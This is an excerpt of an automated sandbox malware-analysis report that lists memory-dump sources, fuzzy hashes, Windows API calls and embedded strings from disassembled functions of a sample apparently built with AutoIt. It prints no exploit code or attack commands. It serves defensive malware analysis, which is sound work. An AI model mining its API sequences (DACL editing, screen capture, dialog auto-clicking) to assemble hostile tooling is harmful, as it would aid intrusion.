                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                            • String ID: 0$tooltips_class32
                                            • API String ID: 1297703922-3619404913
                                            • Opcode ID: 062133f0465b4e9b80f427d05e9a003bfc03de01b9e0ecdfe3b7a7fb89745ad6
                                            • Instruction ID: 244aed8adf882d56acc10ae1a8377896d139524cd8113aa42443cfe2cd22bb89
                                            • Opcode Fuzzy Hash: 062133f0465b4e9b80f427d05e9a003bfc03de01b9e0ecdfe3b7a7fb89745ad6
                                            • Instruction Fuzzy Hash: 7C71AEB1160206AFDB21CF28DC49FA677E9FB88380F48452DF995872A0D771E955CF12
                                            APIs
                                            • CharUpperBuffW.USER32(?,?), ref: 002B46AB
                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002B46F6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: BuffCharMessageSendUpper
                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                            • API String ID: 3974292440-4258414348
                                            • Opcode ID: b03e4e923e5e82175ac8187cff450e03b86e0d6193fce69f76b55f864796df30
                                            • Instruction ID: 8342ef686e129048e99c11484709ffcfce3b1bd9659f938fb1b6317a3fae851c
                                            • Opcode Fuzzy Hash: b03e4e923e5e82175ac8187cff450e03b86e0d6193fce69f76b55f864796df30
                                            • Instruction Fuzzy Hash: 7F919F742247029FCB14FF14C891AAAB7A1AF45354F04485DF8965B3A3CB70ED6ACF81
                                            APIs
                                            • LoadStringW.USER32(00000066,?,00000FFF,002BFB78), ref: 0029A0FC
                                              • Part of subcall function 00237F41: _memmove.LIBCMT ref: 00237F82
                                            • LoadStringW.USER32(?,?,00000FFF,?), ref: 0029A11E
                                            • __swprintf.LIBCMT ref: 0029A177
                                            • __swprintf.LIBCMT ref: 0029A190
                                            • _wprintf.LIBCMT ref: 0029A246
                                            • _wprintf.LIBCMT ref: 0029A264
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: LoadString__swprintf_wprintf$_memmove
                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%,
                                            • API String ID: 311963372-1461424734
                                            • Opcode ID: 5dd892d38f658a7f989cc1ac5389cb36ddac27aaf309e945d9e6f1f464cdda7f
                                            • Instruction ID: 25d50a4ae3bea03da32b25160e7c59370060fbda39086c0a6f102b355dd86e01
                                            • Opcode Fuzzy Hash: 5dd892d38f658a7f989cc1ac5389cb36ddac27aaf309e945d9e6f1f464cdda7f
                                            • Instruction Fuzzy Hash: 565173B1920209BACF25EBE0DD86EEEB779AF04304F140165F905721A1EB316F68DF91
                                            APIs
                                              • Part of subcall function 00239997: __itow.LIBCMT ref: 002399C2
                                              • Part of subcall function 00239997: __swprintf.LIBCMT ref: 00239A0C
                                            • CharLowerBuffW.USER32(?,?), ref: 0029A636
                                            • GetDriveTypeW.KERNEL32 ref: 0029A683
                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0029A6CB
                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0029A702
                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0029A730
                                              • Part of subcall function 00237D2C: _memmove.LIBCMT ref: 00237D66
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                            • API String ID: 2698844021-4113822522
                                            • Opcode ID: 85ea83af9de31f662678bc121f6a6639c0ffb35fd5714286214ea5dcd624dc78
                                            • Instruction ID: 214842013e11c123089bb82af8c0a81335a4a9c652d4f2fa1c52494ed5af779b
                                            • Opcode Fuzzy Hash: 85ea83af9de31f662678bc121f6a6639c0ffb35fd5714286214ea5dcd624dc78
                                            • Instruction Fuzzy Hash: 04516BB11243059FCB10EF21C98186AB7F8FF99718F54496CF89657261DB31AE19CF82
                                            APIs
                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0029A47A
                                            • __swprintf.LIBCMT ref: 0029A49C
                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0029A4D9
                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0029A4FE
                                            • _memset.LIBCMT ref: 0029A51D
                                            • _wcsncpy.LIBCMT ref: 0029A559
                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0029A58E
                                            • CloseHandle.KERNEL32(00000000), ref: 0029A599
                                            • RemoveDirectoryW.KERNEL32(?), ref: 0029A5A2
                                            • CloseHandle.KERNEL32(00000000), ref: 0029A5AC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                            • String ID: :$\$\??\%s
                                            • API String ID: 2733774712-3457252023
                                            • Opcode ID: a40f9f611ac473df09713128f6c7760d70b7320b6d4861eadf7afe2d46b6ecec
                                            • Instruction ID: 3eca437d9186c63af6ffc7c72b126234cebd534fca7bd3fe0157e1f7230b0de3
                                            • Opcode Fuzzy Hash: a40f9f611ac473df09713128f6c7760d70b7320b6d4861eadf7afe2d46b6ecec
                                            • Instruction Fuzzy Hash: 4D31C3B6A1020AABDB21DFA0DC49FEB73BCEF88701F5041B6F909D2160E77097548B65
                                            APIs
                                              • Part of subcall function 0028874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00288766
                                              • Part of subcall function 0028874A: GetLastError.KERNEL32(?,0028822A,?,?,?), ref: 00288770
                                              • Part of subcall function 0028874A: GetProcessHeap.KERNEL32(00000008,?,?,0028822A,?,?,?), ref: 0028877F
                                              • Part of subcall function 0028874A: RtlAllocateHeap.NTDLL(00000000,?,0028822A), ref: 00288786
                                              • Part of subcall function 0028874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0028879D
                                              • Part of subcall function 002887E7: GetProcessHeap.KERNEL32(00000008,00288240,00000000,00000000,?,00288240,?), ref: 002887F3
                                              • Part of subcall function 002887E7: RtlAllocateHeap.NTDLL(00000000,?,00288240), ref: 002887FA
                                              • Part of subcall function 002887E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00288240,?), ref: 0028880B
                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00288458
                                            • _memset.LIBCMT ref: 0028846D
                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0028848C
                                            • GetLengthSid.ADVAPI32(?), ref: 0028849D
                                            • GetAce.ADVAPI32(?,00000000,?), ref: 002884DA
                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002884F6
                                            • GetLengthSid.ADVAPI32(?), ref: 00288513
                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00288522
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 00288529
                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0028854A
                                            • CopySid.ADVAPI32(00000000), ref: 00288551
                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00288582
                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002885A8
                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002885BC
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                            • String ID:
                                            • API String ID: 2347767575-0
                                            • Opcode ID: d7126928f5a03294ac207bac9c30f19ee65860eeb797de794e39e4326e1e694e
                                            • Instruction ID: 9a85672ff9599ced80960ce3116eeee03bace2b627f6feb49fd8f2c0790e083b
                                            • Opcode Fuzzy Hash: d7126928f5a03294ac207bac9c30f19ee65860eeb797de794e39e4326e1e694e
                                            • Instruction Fuzzy Hash: FC616D7591120AAFDF10EFA4DD44AEEBBB9FF04300F848629F915A7291DB349A14CF60
                                            APIs
                                            • GetDC.USER32(00000000), ref: 002A76A2
                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 002A76AE
                                            • CreateCompatibleDC.GDI32(?), ref: 002A76BA
                                            • SelectObject.GDI32(00000000,?), ref: 002A76C7
                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 002A771B
                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 002A7757
                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 002A777B
                                            • SelectObject.GDI32(00000006,?), ref: 002A7783
                                            • DeleteObject.GDI32(?), ref: 002A778C
                                            • DeleteDC.GDI32(00000006), ref: 002A7793
                                            • ReleaseDC.USER32(00000000,?), ref: 002A779E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                            • String ID: (
                                            • API String ID: 2598888154-3887548279
                                            • Opcode ID: 9d65d636b9901ef545a386e7ec63be8aa1f5aac68307e769d44a29cb06c56235
                                            • Instruction ID: bc231754ccba2ac58e70e1ea8db881d75250000e23b09c1428b22d8bb652d0b7
                                            • Opcode Fuzzy Hash: 9d65d636b9901ef545a386e7ec63be8aa1f5aac68307e769d44a29cb06c56235
                                            • Instruction Fuzzy Hash: 31517C75914309EFCB14CFA8DC88EAEBBB9EF49710F14852DF94997220DB31A850CB64
                                            APIs
                                              • Part of subcall function 00250B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00236C6C,?,00008000), ref: 00250BB7
                                              • Part of subcall function 002348AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002348A1,?,?,002337C0,?), ref: 002348CE
                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00236D0D
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00236E5A
                                              • Part of subcall function 002359CD: _wcscpy.LIBCMT ref: 00235A05
                                              • Part of subcall function 0025387D: _iswctype.LIBCMT ref: 00253885
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                            • API String ID: 537147316-1018226102
                                            • Opcode ID: bc844ebd06c9d52e36d6f7b4426f3743a5d90b4791e8fa817b47936e8f7822e8
                                            • Instruction ID: aa0aa418eb7c6bbddf04f080c3b86b0cee6370929419a430ff4486819dbd2ed1
                                            • Opcode Fuzzy Hash: bc844ebd06c9d52e36d6f7b4426f3743a5d90b4791e8fa817b47936e8f7822e8
                                            • Instruction Fuzzy Hash: 6302C1B51283419FCB24EF24C881AAFBBE5BF99314F04491DF489972A1DB30D969CF42
                                            APIs
                                            • _memset.LIBCMT ref: 002345F9
                                            • GetMenuItemCount.USER32(002F6890), ref: 0026D7CD
                                            • GetMenuItemCount.USER32(002F6890), ref: 0026D87D
                                            • GetCursorPos.USER32(?), ref: 0026D8C1
                                            • SetForegroundWindow.USER32(00000000), ref: 0026D8CA
                                            • TrackPopupMenuEx.USER32(002F6890,00000000,?,00000000,00000000,00000000), ref: 0026D8DD
                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0026D8E9
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                            • String ID:
                                            • API String ID: 2751501086-0
                                            • Opcode ID: 6ccad06ae475b3826b6d996305f48f94a091f302c96101e3a3f5b2b5a0203cce
                                            • Instruction ID: 5e2e275c694a236bbe29383c16c155460d4caa32447f3f5270a0aa42472bb019
                                            • Opcode Fuzzy Hash: 6ccad06ae475b3826b6d996305f48f94a091f302c96101e3a3f5b2b5a0203cce
                                            • Instruction Fuzzy Hash: F471D770B6020ABAEB319F64DC49FAAFF68FF05364F100226F525661E1C7B16870DB91
                                            APIs
                                            • CharUpperBuffW.USER32(?,?), ref: 002B10BC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: BuffCharUpper
                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                            • API String ID: 3964851224-909552448
                                            • Opcode ID: f7c804419a5cdb63edf8e0f67f963f1dcdf05cd2e400a283968c32c66d8c35c0
                                            • Instruction ID: 621fa692fbee11818884fed78db37463e3098648f94abd3b2147daeca4988855
                                            • Opcode Fuzzy Hash: f7c804419a5cdb63edf8e0f67f963f1dcdf05cd2e400a283968c32c66d8c35c0
                                            • Instruction Fuzzy Hash: CD415B7017129B8BCF11EF94DDA1AEB3724EF15390F904454EC955B291DB70EA3ACBA0
                                            APIs
                                              • Part of subcall function 00237D2C: _memmove.LIBCMT ref: 00237D66
                                              • Part of subcall function 00237A84: _memmove.LIBCMT ref: 00237B0D
                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 002955D2
                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 002955E8
                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002955F9
                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0029560B
                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0029561C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: SendString$_memmove
                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                            • API String ID: 2279737902-1007645807
                                            • Opcode ID: 5e2f2ccc13d01d1d257f1fb6e0f42e9279ff4b102587df47a92cd004df1e0423
                                            • Instruction ID: ffa8bcab1acfb103a3b764f2e3e625e13b236af347962e64a70b0ab7a59bc724
                                            • Opcode Fuzzy Hash: 5e2f2ccc13d01d1d257f1fb6e0f42e9279ff4b102587df47a92cd004df1e0423
                                            • Instruction Fuzzy Hash: 0E1198A0AB01A979DB20F666CC89DFFBF7CEF92B00F800459B401920D1DE601D25CAB1
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                            • String ID: 0.0.0.0
                                            • API String ID: 208665112-3771769585
                                            • Opcode ID: 357420e36f8d0862ed31c7623782d720cfe94958881cc018c329b005d57ba3b6
                                            • Instruction ID: 4429c1d491ef7aa5b409a24d7b066782f611829227c7c9a27bc76153925e8261
                                            • Opcode Fuzzy Hash: 357420e36f8d0862ed31c7623782d720cfe94958881cc018c329b005d57ba3b6
                                            • Instruction Fuzzy Hash: D811E732924115ABDF20FB64ED4AEDB77BCDF01721F0402B6F80896091EF709AE69B51
                                            APIs
                                            • timeGetTime.WINMM ref: 0029521C
                                              • Part of subcall function 00250719: timeGetTime.WINMM ref: 0025071D
                                            • Sleep.KERNEL32(0000000A), ref: 00295248
                                            • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 0029526C
                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0029528E
                                            • SetActiveWindow.USER32 ref: 002952AD
                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 002952BB
                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 002952DA
                                            • Sleep.KERNEL32(000000FA), ref: 002952E5
                                            • IsWindow.USER32 ref: 002952F1
                                            • EndDialog.USER32(00000000), ref: 00295302
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                            • String ID: BUTTON
                                            • API String ID: 1194449130-3405671355
                                            • Opcode ID: 43236289c13780588f349502433e296daadb1ee157cc51b938952656bd291e58
                                            • Instruction ID: 5eed54a5250f934558f8918085e3e4c63f2f5b6c80679bc5047342f23bed7a64
